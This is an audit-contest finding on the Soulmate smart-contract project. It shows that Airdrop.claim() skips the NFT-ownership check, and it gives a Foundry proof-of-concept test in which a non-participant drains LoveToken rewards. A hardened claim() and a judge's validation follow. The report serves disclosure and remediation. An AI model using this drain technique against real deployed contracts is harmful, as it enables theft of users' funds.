Tags: Beginner Friendly, Foundry, NFT
100 EXP
Submission Details
Severity: high
Valid

Funds can be drained by non participants

A non-participant (an address that never minted a soulmate NFT) can call claim() on airdropContract and be paid out in LoveToken.

This happens because, for an address that never minted, the lookup that claim() performs resolves to tokenId 0 and its idToCreationTimestamp value is 0, yet claim() never checks that the caller actually owns a soulmate NFT before computing the reward from that value.

As a result, as the test below shows, an arbitrary address can drain the airdrop funds.

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.23;

import {BaseTest} from "./BaseTest.t.sol";
import {console2} from "forge-std/Test.sol";
import {Soulmate} from "../../src/Soulmate.sol";

contract EvilTests is BaseTest {
    /*
     * Airdrop.claim() does not check that idToCreationTimestamp != 0 (i.e. that the
     * caller actually owns a soulmate NFT). As a result a random non-participant can
     * drain the funds.
     */
    function test_AirdropCanBeClaimedByAnyone() public {
        // randomPerson has never minted a soulmate NFT.
        address randomPerson = makeAddr("randomPerson");

        // Advance time so that the reward computation yields 10 full days.
        vm.warp(block.timestamp + 10 days + 1 seconds);

        // Claim as the non-participant: no ownership check stops this call.
        vm.prank(randomPerson);
        airdropContract.claim();

        // One LoveToken per day: 10 days of rewards paid to an address that never participated.
        assertTrue(loveToken.balanceOf(randomPerson) == 10 ether);
    }
}
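As an added illustration, not code from the Soulmate repository, the following is a hardened shape of claim() that adds the ownership check this finding calls for. The ISoulmate and ILoveToken interfaces are constructed minimal stand-ins: ownerToId and idToCreationTimestamp are the names used above, while soulmateOf and isDivorced(address) are assumed here to keep the example self-contained.

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.23;

// Constructed for this example: the subset of the Soulmate surface the airdrop needs.
// ownerToId / idToCreationTimestamp mirror the names in the finding; soulmateOf and
// isDivorced(address) are assumed signatures, not taken from the project.
interface ISoulmate {
    function ownerToId(address owner) external view returns (uint256);
    function idToCreationTimestamp(uint256 tokenId) external view returns (uint256);
    function soulmateOf(address owner) external view returns (address);
    function isDivorced(address owner) external view returns (bool);
}

interface ILoveToken {
    function transfer(address to, uint256 amount) external returns (bool);
}

contract AirdropHardened {
    uint256 public constant DAY_IN_SECONDS = 1 days;
    uint256 public constant TOKENS_PER_DAY = 1 ether; // one LoveToken per day in couple

    ISoulmate public immutable soulmateContract;
    ILoveToken public immutable loveToken;

    // Amount each address has already claimed, so repeated calls only pay out newly accrued days.
    mapping(address => uint256) public claimedBy;

    error NotASoulmate(address caller);
    error Divorced(address caller);
    error NothingToClaim();

    constructor(ISoulmate _soulmate, ILoveToken _loveToken) {
        soulmateContract = _soulmate;
        loveToken = _loveToken;
    }

    function claim() external {
        // The guard the finding says is missing: an address that never minted has no
        // soulmate, but ownerToId(msg.sender) still returns 0 and the rest of the
        // function would otherwise compute rewards as if the caller were tokenId 0.
        if (soulmateContract.soulmateOf(msg.sender) == address(0)) {
            revert NotASoulmate(msg.sender);
        }
        // Divorce check keyed on the caller (assumed signature) so it cannot default
        // to false for an address that was never part of a couple.
        if (soulmateContract.isDivorced(msg.sender)) {
            revert Divorced(msg.sender);
        }

        uint256 tokenId = soulmateContract.ownerToId(msg.sender);
        uint256 createdAt = soulmateContract.idToCreationTimestamp(tokenId);
        // Belt and braces: a zero creation timestamp means no real couple exists for this id.
        if (createdAt == 0) revert NotASoulmate(msg.sender);

        uint256 daysInCouple = (block.timestamp - createdAt) / DAY_IN_SECONDS;
        uint256 totalEarned = daysInCouple * TOKENS_PER_DAY;
        uint256 alreadyClaimed = claimedBy[msg.sender];
        if (totalEarned <= alreadyClaimed) revert NothingToClaim();

        uint256 payout = totalEarned - alreadyClaimed;
        claimedBy[msg.sender] = totalEarned; // effects before interaction
        require(loveToken.transfer(msg.sender, payout), "transfer failed");
    }
}
```

With this guard in place, the test above would revert with NotASoulmate(randomPerson) at the claim() call instead of paying out 10 ether, because the ownership check runs before any reward is computed from tokenId 0.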
Updates

Lead Judging Commences

0xnevi Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-claim-airdrop-without-owning-NFT

High severity, This issue is separated from the flawed `isDivorced()` check presented in issue #168 as even if that is fixed, if ownership is not checked, isDivorced would still default to false and allow bypass to claim airdrops by posing as tokenId 0 in turn resulting in this [important check for token claim is bypassed.](https://github.com/Cyfrin/2024-02-soulmate/blob/b3f9227942ffd5c443ce6bccaa980fea0304c38f/src/Airdrop.sol#L61-L66). #220 is the most comprehensive issue as it correctly recognizes both issues existing within the same function.
